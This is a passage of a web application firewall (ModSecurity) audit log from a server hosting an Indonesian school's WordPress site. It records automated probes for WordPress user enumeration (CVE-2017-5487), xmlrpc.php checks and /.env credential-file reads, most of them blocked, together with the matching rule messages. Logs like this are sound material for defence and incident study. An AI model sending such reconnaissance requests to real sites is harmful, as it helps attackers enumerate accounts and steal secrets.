REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746880334759713 2610 (- - -) Stopwatch2: 1746880334759713 2610; combined=1190, p1=418, p2=742, p3=0, p4=0, p5=29, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f915a52f-Z-- --bf45116d-A-- [10/May/2025:19:47:37 +0700] aB9K6ci6w7GTj2w44Z7qJAAAAMc 103.236.140.4 49876 103.236.140.4 8181 --bf45116d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bf45116d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf45116d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746881257747607 3146 (- - -) Stopwatch2: 1746881257747607 3146; combined=1402, p1=472, p2=898, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf45116d-Z-- --7998e678-A-- [10/May/2025:19:47:43 +0700] aB9K79r9PbfRBMhzxmSmFwAAAEg 103.236.140.4 49968 103.236.140.4 8181 --7998e678-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.138 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7998e678-C-- demo.sayHello --7998e678-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7998e678-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746881263452591 5557 (- - -) Stopwatch2: 1746881263452591 5557; combined=4244, p1=540, p2=3475, p3=35, p4=36, p5=93, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7998e678-Z-- --ebb86a57-A-- [10/May/2025:19:59:47 +0700] aB9Nw8i6w7GTj2w44Z7vOAAAAM0 103.236.140.4 36046 103.236.140.4 8181 --ebb86a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ebb86a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebb86a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746881987320647 2416 (- - -) Stopwatch2: 1746881987320647 2416; combined=1391, p1=424, p2=937, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebb86a57-Z-- --99b94561-A-- [10/May/2025:19:59:52 +0700] aB9NyKuC4AqLGUOyzyVA9QAAAJU 103.236.140.4 36150 103.236.140.4 8181 --99b94561-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --99b94561-C-- demo.sayHello --99b94561-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --99b94561-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746881992403221 5223 (- - -) Stopwatch2: 1746881992403221 5223; combined=3754, p1=513, p2=3044, p3=32, p4=33, p5=79, sr=61, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99b94561-Z-- --6568ff6e-A-- [10/May/2025:20:01:38 +0700] aB9OMquC4AqLGUOyzyVBKAAAAI8 103.236.140.4 38124 103.236.140.4 8181 --6568ff6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 47.109.19.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 47.109.19.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6568ff6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6568ff6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746882098713224 2565 (- - -) Stopwatch2: 1746882098713224 2565; combined=1176, p1=366, p2=783, p3=0, p4=0, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6568ff6e-Z-- --1fdc5b73-A-- [10/May/2025:20:21:53 +0700] aB9S8auC4AqLGUOyzyVEowAAAJE 103.236.140.4 58640 103.236.140.4 8181 --1fdc5b73-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.184.206.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.184.206.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1fdc5b73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fdc5b73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746883313120582 3126 (- - -) Stopwatch2: 1746883313120582 3126; combined=1381, p1=436, p2=912, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fdc5b73-Z-- --f74c877c-A-- [10/May/2025:20:25:59 +0700] aB9T58i6w7GTj2w44Z720wAAANQ 103.236.140.4 34188 103.236.140.4 8181 --f74c877c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 220.247.162.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 220.247.162.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f74c877c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f74c877c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746883559588471 2817 (- - -) Stopwatch2: 1746883559588471 2817; combined=1273, p1=424, p2=820, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f74c877c-Z-- --f6745c0c-A-- [10/May/2025:20:46:03 +0700] aB9YmxLuBiaF9R054QDEMAAAAAA 103.236.140.4 52146 103.236.140.4 8181 --f6745c0c-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --f6745c0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6745c0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746884763896874 777 (- - -) Stopwatch2: 1746884763896874 777; combined=307, p1=269, p2=0, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6745c0c-Z-- --6dc81d48-A-- [10/May/2025:21:23:31 +0700] aB9hY9r9PbfRBMhzxmTJ-AAAAEw 103.236.140.4 34996 103.236.140.4 8181 --6dc81d48-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6dc81d48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6dc81d48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746887011167539 2544 (- - -) Stopwatch2: 1746887011167539 2544; combined=1116, p1=383, p2=706, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6dc81d48-Z-- --9d34c60d-A-- [10/May/2025:21:23:38 +0700] aB9hatr9PbfRBMhzxmTKDQAAAFE 103.236.140.4 35292 103.236.140.4 8181 --9d34c60d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9d34c60d-C-- demo.sayHello --9d34c60d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d34c60d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746887018959700 5179 (- - -) Stopwatch2: 1746887018959700 5179; combined=3754, p1=505, p2=3064, p3=27, p4=30, p5=76, sr=62, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d34c60d-Z-- --170e9b74-A-- [10/May/2025:21:26:56 +0700] aB9iMKuC4AqLGUOyzyVkngAAAII 103.236.140.4 43078 103.236.140.4 8181 --170e9b74-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --170e9b74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --170e9b74-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746887216903749 2627 (- - -) Stopwatch2: 1746887216903749 2627; combined=1119, p1=346, p2=738, p3=0, p4=0, p5=34, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --170e9b74-Z-- --427e8379-A-- [10/May/2025:21:27:04 +0700] aB9iOMi6w7GTj2w44Z4ZGQAAAME 103.236.140.4 43362 103.236.140.4 8181 --427e8379-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.137.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.137.227 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --427e8379-C-- demo.sayHello --427e8379-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --427e8379-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746887224541097 4504 (- - -) Stopwatch2: 1746887224541097 4504; combined=3174, p1=427, p2=2562, p3=28, p4=27, p5=75, sr=54, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --427e8379-Z-- --04f0c013-A-- [10/May/2025:21:28:07 +0700] aB9idxLuBiaF9R054QDf5AAAAAs 103.236.140.4 45700 103.236.140.4 8181 --04f0c013-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.35.108.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.35.108.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04f0c013-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04f0c013-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746887287667717 2233 (- - -) Stopwatch2: 1746887287667717 2233; combined=943, p1=318, p2=604, p3=0, p4=0, p5=21, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04f0c013-Z-- --3aec2759-A-- [10/May/2025:21:31:11 +0700] aB9jL8i6w7GTj2w44Z4cXgAAANQ 103.236.140.4 52600 103.236.140.4 8181 --3aec2759-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.163.113.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.163.113.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3aec2759-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3aec2759-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746887471840896 2508 (- - -) Stopwatch2: 1746887471840896 2508; combined=1148, p1=429, p2=692, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3aec2759-Z-- --cbdf9261-A-- [10/May/2025:21:52:35 +0700] aB9oM8i6w7GTj2w44Z4vxAAAAMo 103.236.140.4 45690 103.236.140.4 8181 --cbdf9261-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:47.0) Gecko/20100101 Firefox/47.0 Accept-Charset: utf-8 --cbdf9261-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbdf9261-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746888755614841 752 (- - -) Stopwatch2: 1746888755614841 752; combined=284, p1=246, p2=0, p3=0, p4=0, p5=38, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdf9261-Z-- --4a93c252-A-- [10/May/2025:22:15:58 +0700] aB9trsi6w7GTj2w44Z5FVQAAAMs 103.236.140.4 45178 103.236.140.4 8181 --4a93c252-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.182.227.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.182.227.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4a93c252-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a93c252-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746890158253695 6864 (- - -) Stopwatch2: 1746890158253695 6864; combined=5141, p1=1289, p2=3808, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a93c252-Z-- --88e11d79-A-- [10/May/2025:22:39:07 +0700] aB9zG9r9PbfRBMhzxmQWiQAAAFU 103.236.140.4 47728 103.236.140.4 8181 --88e11d79-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.227.70.2 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --88e11d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88e11d79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746891547564895 618 (- - -) Stopwatch2: 1746891547564895 618; combined=256, p1=187, p2=0, p3=0, p4=0, p5=68, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 